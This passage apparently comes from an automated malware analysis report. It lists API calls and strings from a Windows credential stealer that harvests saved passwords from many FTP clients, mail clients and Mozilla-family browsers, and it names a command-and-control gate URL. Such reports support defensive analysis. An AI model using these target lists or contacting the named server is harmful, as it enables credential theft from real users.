                  • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,00414841,?,00000104,?), ref: 004050BF
                  • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,00414841,?,00000104,?), ref: 004050FA
                  • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                  • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                  • API String ID: 2508676433-45949541
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EA1C
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EA50
                  • GetPrivateProfileStringA.KERNEL32(Program,DataPath,00414841,?,00000104,00000000), ref: 0040EAD6
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EB2F
                  • API ID: AllocCloseEnumLocalOpenPrivateProfileString
                  • String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
                  • API String ID: 1343824468-2495907966
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406413
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406447
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406655
                  • API ID: CloseEnumOpen
                  • String ID: Host$Port$PthR$SSH$User
                  • API String ID: 1332880857-1643752846
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00405F62
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F96
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406142
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  • API ID: CloseEnumFreeLocalOpen
                  • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                  • API String ID: 3369285772-3748300950
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040718F
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004071C3
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407355
                  • API ID: CloseEnumOpen
                  • String ID: Directory$Password$Server$UserName$_Password
                  • API String ID: 1332880857-3317168126
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DA0D
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DA41
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DBD5
                  • API ID: CloseEnumOpen
                  • String ID: HostName$Password$PortNumber$TerminalType$UserName
                  • API String ID: 1332880857-1017491782
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004073BA
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073EE
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407580
                  • API ID: CloseEnumOpen
                  • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                  • API String ID: 1332880857-980612798
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 004061FA
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040622E
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004063C3
                  • API ID: CloseEnumOpen
                  • String ID: HostDirName$HostName$Password$Port$Username
                  • API String ID: 1332880857-791697221
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C6B
                  • InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403C96
                  • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403CDC
                  • wsprintfA.USER32 ref: 00403CFB
                  • lstrlen.KERNEL32(?,00002000,00002000), ref: 00403D1E
                  • closesocket.WS2_32(?), ref: 00403D48
                  Strings
                  • <, xrefs: 00403CB6
                  • GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403CF3
                  • API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
                  • String ID: <$GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                  • API String ID: 4072649068-555445111
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D5D6
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D60A
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D78D
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$Pass$Port$Remote Dir$User
                  • API String ID: 1332880857-1775099961
                  APIs
                  • StrStrIA.SHLWAPI(00D36918,BlazeFtp), ref: 0040C84A
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                  • API String ID: 1884169789-2976447346
                  APIs
                  • StrStrIA.SHLWAPI(00D36918,CUTEFTP), ref: 004053EA
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 00405488
                  • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405447
                  • CUTEFTP, xrefs: 004053E4
                  • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 0040546E
                  • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 0040547B
                  • \sm.dat, xrefs: 004053FE
                  • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 00405461
                  • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405454
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
                  • API String ID: 1884169789-2738976122
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403B00
                  • lstrlen.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403B11
                  • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403B32
                  • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 00403B49
                  • lstrlen.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 00403B5A
                  Similarity
                  • API ID: lstrlen$AllocLocal
                  • String ID: Content-Length:$Location:
                  • API String ID: 2140729754-2400408565
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406D65
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D99
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406F3A
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Similarity
                  • API ID: CloseEnumFreeLocalOpen
                  • String ID: Hostname$Password$Port$Username
                  • API String ID: 3369285772-1811172798
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406B31
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B65
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406CDA
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Similarity
                  • API ID: CloseEnumFreeLocalOpen
                  • String ID: FtpPort$Password$Server$Username
                  • API String ID: 3369285772-1828875246
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E247
                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040E377
                    • Part of subcall function 004043DC: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
                    • Part of subcall function 004043DC: LocalFree.KERNEL32(00000000), ref: 0040445C
                    • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                  Similarity
                  • API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
                  • String ID: Folder$Port$Site$UserID$xflags
                  • API String ID: 2167297517-269738940
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004078DB
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040790F
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407A2A
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: DataDir$InstallPath$sites.dat$sites.ini
                  • API String ID: 1332880857-3870687875
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F84D
                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F892
                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F8AD
                  • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F8F2
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                  • API String ID: 3062143572-138716004
                  APIs
                  • StrStrA.SHLWAPI(00D36918,unleap.exe), ref: 00407AB1
                  • lstrlen.KERNEL32(unleap.exe,00000001,00D36918,unleap.exe), ref: 00407ACA
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  • StrStrIA.SHLWAPI(00D33330,leapftp,00D36918,unleap.exe), ref: 00407B0E
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
                  • API String ID: 1884169789-1497043051
                  APIs
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  • wsprintfA.USER32 ref: 0040F041
                  Similarity
                  • API ID: FreeLocalwsprintf
                  • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                  • API String ID: 988369812-1921698578
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404C7B
                  Similarity
                  • API ID: AllocDirectoryLocalWindows
                  • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                  • API String ID: 3186838798-3636168975
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00404931
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404965
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404A8C
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: HostName$Password$User
                  • API String ID: 1332880857-1253078594
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408E20
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408E54
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408F46
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                  • API String ID: 1332880857-3184955129
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409E28
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409E6D
                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                    • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                    • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Similarity
                  • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                  • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                  • API String ID: 3007406096-624000163
                  APIs
                  • StrStrIA.SHLWAPI(?,?), ref: 00409C48
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                    • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                    • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Similarity
                  • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                  • String ID: PathToExe
                  • API String ID: 3012581338-1982016430
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00404823
                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 0040485C
                  • StrStrIA.SHLWAPI(?,Line), ref: 0040488D
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404912
                  Similarity
                  • API ID: CloseEnumOpenValue
                  • String ID: Line
                  • API String ID: 4012628704-1898322888
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E393
                  • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E3CC
                  • StrStrIA.SHLWAPI(?,.wjf), ref: 0040E413
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E440
                  Similarity
                  • API ID: CloseEnumOpenValue
                  • String ID: .wjf
                  • API String ID: 4012628704-198459012
                  APIs
                    • Part of subcall function 004027F7: GetTempPathA.KERNEL32(00000104,?), ref: 0040282D
                    • Part of subcall function 004027F7: GlobalFix.KERNEL32(?), ref: 004028BB
                    • Part of subcall function 004027F7: GlobalUnWire.KERNEL32(?), ref: 004028DD
                  • 760B6F40.OLE32(?,00000000), ref: 0040458F
                  • wsprintfA.USER32 ref: 004045D6
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004045E2
                  Similarity
                  • API ID: Global$PathTempWirelstrlenwsprintf
                  • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                  • API String ID: 1250355450-1100116640
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409D72
                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409DB7
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                  • API String ID: 3062143572-2631691096
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409EAF
                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409EF4
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                  • API String ID: 3062143572-164276155
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409F36
                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409F7B
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Flock$Software\Mozilla$\Flock\Browser\
                  • API String ID: 3062143572-1276807325
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409FBD
                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A002
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                  • API String ID: 3062143572-2716603926
                  APIs
                  • StrStrIA.SHLWAPI(00D36918,3D-FTP), ref: 0040CA80
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
                  • API String ID: 1884169789-4074339522
                  APIs
                  • lstrlen.KERNEL32(?), ref: 00401E6D
                  • lstrlen.KERNEL32(00000000,?), ref: 00401E77
                  • lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                  Similarity
                  • API ID: lstrlen$lstrcatlstrcpy
                  • String ID: AHA
                  • API String ID: 2414487701-3076688622
                  APIs
                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040282D
                  • GlobalFix.KERNEL32(?), ref: 004028BB
                  • GlobalUnWire.KERNEL32(?), ref: 004028DD
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                    • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                    • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                  Similarity
                  • API ID: lstrlen$Globallstrcatlstrcpy$PathTempWire
                  • String ID: Software\WinRAR
                  • API String ID: 3226276397-224198155
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040AEED
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AF21
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040B009
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACAA
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACBD
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACD0
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACE3
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACF6
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD09
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD1C
                  Similarity
                  • API ID: wsprintf$CloseEnumOpen
                  • String ID: SiteServers
                  • API String ID: 1693054222-2402683488
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408D31
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D65
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408E04
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: MRU
                  • API String ID: 1332880857-344939820
                  APIs
                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401CD2
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401CED
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401D23
                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401D45
                  Similarity
                  • API ID: QueryValue$CloseOpen
                  • String ID:
                  • API String ID: 1586453840-0
                  APIs
                  • lstrcmpiA.KERNEL32(00000000,logins), ref: 0040BE49
                  • lstrcmp.KERNEL32(table,?), ref: 0040BE7E
                    • Part of subcall function 0040BAF7: StrStrIA.SHLWAPI(?,() ), ref: 0040BB07
                  Similarity
                  • API ID: lstrcmplstrcmpi
                  • String ID: logins$table
                  • API String ID: 3524194181-3800951466
                  Similarity
                  • API ID:
                  • String ID: "password" : "
                  • API String ID: 0-2310853927
                  APIs
                  • wsprintfA.USER32 ref: 0040D315
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Similarity
                  • API ID: FreeLocalwsprintf
                  • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                  • API String ID: 988369812-376751567
                  APIs
                  • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401236
                  • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040125A
                  • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401266
                  Similarity
                  • API ID: CloseExitFileHandleProcessRead
                  • String ID:
                  • API String ID: 1390701169-0
                  APIs
                    • Part of subcall function 00403FFB: WSAStartup.WS2_32(00000101,?), ref: 00404010
                  • Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040FE34
                  Similarity
                  • API ID: SleepStartup
                  • String ID: Client Hash$http://dillion0mill.favcc1.com/gate.php
                  • API String ID: 1372284471-3207914052
                  APIs
                  • StrStrIW.SHLWAPI(00000000,004162E9), ref: 0040A904
                  Similarity
                  • API ID:
                  • String ID: ($http://www.facebook.com/
                  • API String ID: 0-3677894361
                  APIs
                  • StrStrIA.SHLWAPI(00D33330,Odin), ref: 0040A0F4
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Similarity
                  • API ID: FreeLocal
                  • String ID: Odin$SiteInfo.QFP
                  • API String ID: 2826327444-4277389770
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004075E5
                  • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407619
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040767C
                  Similarity
                  • API ID: CloseEnumOpenValue
                  • String ID:
                  • API String ID: 4012628704-0
                  APIs
                  • socket.WS2_32(00000002,00000001,00000006), ref: 0040380F
                  • connect.WS2_32(00000000,00000002,00000010), ref: 0040386B
                  • closesocket.WS2_32(00000000), ref: 00403876
                  Similarity
